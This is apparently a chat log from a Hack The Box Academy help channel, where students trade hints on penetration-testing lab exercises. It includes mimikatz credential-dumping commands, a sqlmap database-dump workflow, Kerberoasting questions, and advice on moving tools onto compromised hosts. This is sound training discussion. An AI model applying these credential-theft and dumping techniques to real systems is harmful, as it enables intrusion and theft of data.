You actually don't need to crack it. You can find a cleartext version

really ? how ?

i dumped it with mimikatz

Check the output again

I have tried all of them, from the ones that dont give errors ive got this

5000 are to big

i see nothing, i ran this command : sekurlsa::msv

Bunny, may I ask how many modules you've got done? Iirc you've been pretty close to having all of them done

How about sekurlsa::logonpasswords?

how ty

🙂

#modules message

Ah cool 🙂
Gonna take me a while to catch up to that 😄

at some point you get addicted to these modules

Yeah I'd probably be doing them all day if it wasn't for uni keeping me busy

did you finish the module ?

I've done CPTS path all the way up to Linux PrivEsc. currently working on that

well, actually it's just a login and not a real priv esc

oh ok cool, so do you if it's normal that the xx.xx.10.5 it's note up for the last question ?

is it the dc ?

that host is supposed to be up, yeah

||yes||

and i have to rdp on it

if it has RDP up, sure

What did you find?

I have notes on these but they are a little rusty, dm me.

Hack the planet!

Muhahaha!!!

RDP is not up

who can help me the modulehttps://academy.hackthebox.com/module/147/section/1356

what have you tried so far?

What does not work?

I will Dm you

Sure, let's solve it 🙂

I know. But there is another way

psexec ?

Haven't tried that. Did something much more simple

But there are multiple ways at this point so feel free to experiment

i go too far ahah

ty

I tried ssh root@{ip} -p {port} -i id_rsa, and it's nor working for some reason. Do you have any idea why?

What Have you done so far

I gained access to user1

and copied id_rsa from root, but it's not connecting for some reason

Is this an exercise?

yes

Have you checked permissions on id_rsa?

yes

Which exercise?

shh doesn't connect

Getting Started Privilege Escalation

Well then providing us with the error message would probably be helpful

Yh definitely

that's the problem, there isn't an error

Huh

Maybe check your pwnbox connection

Or the ssh key was copied correctly

Let me see my notes

I used cp to copy the ssh key

Okay

and wc -l says they're the same

Then I don't know why the ssh ain't running then

neither do I

Damn

I don't have notes on these but I am sure it was something very simple. Are you at initial foothold stage or do you already have access to the machine?

it's very simple

Did you resolve it?

If no, share your errors and I might be able to figure it out.

Passed my CCNA today... Now I'm ready to knock out these modules (after a week's rest) 😄

Congrats 🎉

Hello guys! I need help in one question for "Filter Contents" exercise in Linux Fundamentals module, the last question with host "https://www.inlanefreight.com" not works.

What exactly is not working? What have you tried?

The command curl in this URL not working

I have tried curl in ssh connection and in my machine

It's a com address, you can access it from anywhere.

I cant understand the question?

Did you try to SSH to the website?

Hi all I'm new here just joined

Where is the discussion for begginers ?

no, i use the ssh connection for connect my machine in vpn

and inside htbstudent user i tried use curl in this url

The question is ""

"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."

The PwnBox does not have access to the Internet, right?

right

in my machine not works too

Sorry to interrupt dudes...but is there no begginer discussion section?

Then it can not work

why not?
I have just tried it and it works fine

lol i will try again

Hello..can anyone see me typing?

Hi

Welcome

Wait a moment, I am about to find the link

Ahh ok 👍 I was worried I had to do more verification lol

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Check this out ^

Thank you 😊

No worries, if you have more questions, you may ask them on #general

My command: curl https://www.inlanefreight.com
Response: curl: (6) Could not resolve host: www.inlanefreight.com

This seems to be a DNS problem.

hmmm how i can solve this?

What happens when you enter dig www.inlanefreight.com?

i have a response

";; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 47570"

;; ANSWER SECTION:
www.inlanefreight.com. 60 IN A 134.209.24.248

not have this line

and with
dig www.inlanefreight.com @1.1.1.1

with this command i have a authority section

maybe i need change the DNS?

Yes, your DNS resolver does not seem to resolve inlanefreight.com.

Authority? You mean Answer?

In got answer line

maybe the DNS no resolve the host

i will change

this is it, the DNS not resolving the host, thx for the help!

Probably your DNS resolver requires DNSSEC.

Hi guys, im not able to proxy ffuf request, on ffuf itself with -proxy-reply nor with proxychains (i wanted to proxying the tool to view some requests through Burp). Does anybody have the same problem?

I tried with dirb and it worked, but when i try ffuf it doesn't(via proxychains as taught on the module "Using Web Proxies")

Which section is that, can you send its link?

module/110/section/1053 is the guide i followed

Are you trying to solve the exercise or is it something else?

I'm trying to solve an exercise on the FFuf module, and i encountered this problem

I can work around on this, but i just wanted to know why i'm having problems proxying ffuf

The section you have linked does not mention ffuf anywhere.

Nevertheless, proxychains has a config file, it's going to use a proxy for making connections. Make sure it was setup properly

Maybe wrong sections to ask help, i do apologize, thank you anyway

No it's okay, you are working with ATTACKING WEB APPLICATIONS WITH FFUF and you are trying to reuse what you learned in using web proxies on a exercise but this time with ffuf, is that correct?

Yes, correct

i got it by changing the dns settings, thx for help

I can understand a little but don't give up. Try to explain your issue with a little more details and see if someone else has a clue.

Thanks once again, i will

Stuck on pivoting assessment. I am currently RDP'd into ||.25|| as ||vfrank|| and can see that the next hop is to the DC. However, I have no idea how to get access to the DC. I ran an nmap scan and didn't find any open ports, and I can't seem to connect to the DC at all.

Check for ||shares||

Bro, just found it. 🤦‍♂️

thank you anyways

No problem lol

can someone give me a hint at the WINDOWS ATTACKS & DEFENSE , "After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?"

The event ID is communicated in the module.

please.. anyone avaliable to offer little help on LINUX PRIVILEGE ESCALATION ==>> Logrotate

Hi

I know that one is very difficult

I can help you out, dm me

I would like to start a study group for the people just starting out on HTB. DM me to discuss.

I am mounting another vm with windows 10 to run dnspy, visual studio and that things. Do u think it is worth it having both?

Check out ComandoVM
https://github.com/mandiant/commando-vm

ty

that is installed with pentesting tools already?

This script installs hacking tools on your Windows VM

oh nice ty

But it is already a bit older

I can install when I need the tool manually

I used https://gchq.github.io/CyberChef/ It has a much easier interface than Burp or ZAP.

Heyyy - Just completed the XSS module and I'm also working on the port swigg site and the stuff over at swigg has quite a few extra layers of complexity - is there a more advanced XSS module that anyone knows of? the academy platform is leagues ahead so if possible Id prefer to use it 😄

that's the classic ctf experience

There are so many ways that things can happen that I don't think it's necessarily wrong to use something that isn't explicitly stated in the module, and many times (as you noted), it'll stick with you as an option going forward.

That being said, started doing the password attacks module to see if it is as bad as people make it out to be, and whoever made the password mutations challenge just really wants you to waste your time huh

Is anyone available to assist with a question in the Attacking Enterprise Networks module? I'm having an issue with the Web Enumeration & Exploitation section. I've tried different payloads using sqlmap to get access to the database and nothing seems to be working.

Do you still need help? I might be able to

Yes, I could use some help. Thank you!

I'm on the fourth question and I'm trying to use sqlmap to get into the database and so far nothing is working.

Did you review this module? https://academy.hackthebox.com/module/33/section/217 it should help, looking at my notes that was what I started with

I did not use sqlmap, I did it manually. Oh wait scratch that I did it both ways..

No, this is the module. https://academy.hackthebox.com/module/163/section/1544

Yeah I understand that. The module I referenced is worth reviewing for the part you are on. What have you been trying? Maybe showing some of what you tried will give me a better idea of how to help.

Ah, gotcha. I misunderstood.

I've been just trying different variations of sqlmap with different level and risk switches. So far, it looks like sqlmap just doesn't work here.

it does work, are you trying on a GET or POST request?

It was a POST request.

I'm guessing I probably need to try a GET instead?

ok good, I captured the request in Burp and saved it as a file, to make it easier to deal with.

So a POST is fine?

I have it saved to a file as well with the searchitem set as my injection point.

that sounds right

your getting nothing at all on it?

I get the same output in the lesson when I run this command $ sqlmap -r sqli.txt --dbms=mysql -D status --tables. However, when I try to modify it and add switches for level and risk, it just runs forever and appears to just continously start over.

I dont think you need to mess with level and risk, your pretty much there, you just need to pull the data...

I guess that's where I'm confused. I don't see how to pull any data if I can't get logged into the database.

use that same command you have shown me, you just need to tack one more thing onto it..

How would you dump data out of the table?

Yeah, it's a dump alright. I got it! Thank you!

No problem!

I just couldn't recall how to get the database to dump its contents. I was looking all over for it and I kept over looking it. Thank you so much!

For sure! happy to help, I know how that tunnel vision etc can go...

I really thought the only way was to find a way to log in.

Yeah, no kidding.

for this module ：https://academy.hackthebox.com/module/147/section/1356, I find a file that name is Backup.vhd,I got this file through smb protocol from David's user. How do I decrypt this file

If I remeber correctly that is a Windows backup, you need to figure how to mount it. I know there was some information on how to do this in Linux, I ended up booting into a windows machine and mounting it in there. I am going off memory so I might be off.

so can you help me

Is the initial bruteforce for Password Attacks - Hard skill assessment supposed to take this long?

Feel like I've been letting this run forever, and not sure if there's anything better I could be doing

Not really, the ssh doesn't seem to be working, even if I make a mistake on purpose still doesn't reject me

Were you able to get it?

we are about an hour in, probably a little more

but haven't exhausted the list yet

There are some lists provided in the resources, it should only take a couple of minutes

using those lists with the mutations and have gotten nothing

Strange

@rustic sage It works when I ssh from my pc rather than from user2

hey what are you talking

no idea why but the brute forcing for for the initial foothold could be buggy for me so i just give that a quick try and was able to get the password in about 1 min

you have RDP with that user so iether use xfreerdp with a mouted share drive or just use updog

I am having problem with unlocking modules

contact support via the chat bubble

Hi, I'm in 'AD Enumeration & Attacks - Skills Assessment Part I' is anyone have any idea about how to download Rubeus tool to the target machine?

What access do you have already ?

if you are on the first machine just host a python server and wget the tool on the target machine but if you are on ||MS01|| then there an existing web site on the first machine so just put the tool there and on the second machine wget the tool from the first machine running site

TAT

finally QAQ

just finished Password Attacks module... definitely need more than 8 hours -.-

Skills Assessment on progress

The important thing is that you have understood everything, not how long it took you to do it.

hydra toooooo slow (

better to suffer the 8 hours in training than in a real job

lol

Sweat in training so you don't have to bleed in battle

POWER

Yeap. It was tiring but satisfying at the end 😀

How can I find the mail of the administrator when I have a IMAP/POP3 server? I have tried to connect to these servers and list out the mails but I got nothing, then I tried to use NMap and got nothing, then I used curl and I got nothing. Is the answer a part of the banner?

Can someone help me on Attacking Common Application - thick client, where I already downloaded the fatty-server.jar but for some reason it's not opening. stuck in this machine for 4 days 😦

"[...] I have tried to connect to these servers and list out the mails but I got nothing [...]"
Try to give it another go and pay attention to the output it may be that you have overlooked something

There are 0 mails on both of the servers

keep enumerating

I'm encountering the same problem. anyone who could give me hints? thanks in advance.

Does this mean i cant select them but I can still list them?

WHA

Its case sensetive

Omah

:I

Lol

yes, i found it but aaaaa it would have saved so much headache knowing that

hello guys, im looking for a piece of advice if anyone got one, i have finished the AD enumeration module but I don't feel like I've digested all of it's contents, and the assessment felt like 30% of what the contents rly were, is it normal and i just have to practice more or should i go back and redo the module until I've digested every concept there?

If you go back you'll learn it now, maybe to the same level, if you try to do a box or lab you'll learn it and get a deeper understanding

(My opinion, or you could do both)

go through it again, but i can suggest creating your own simple AD lab to play with things. or finding an AD lab online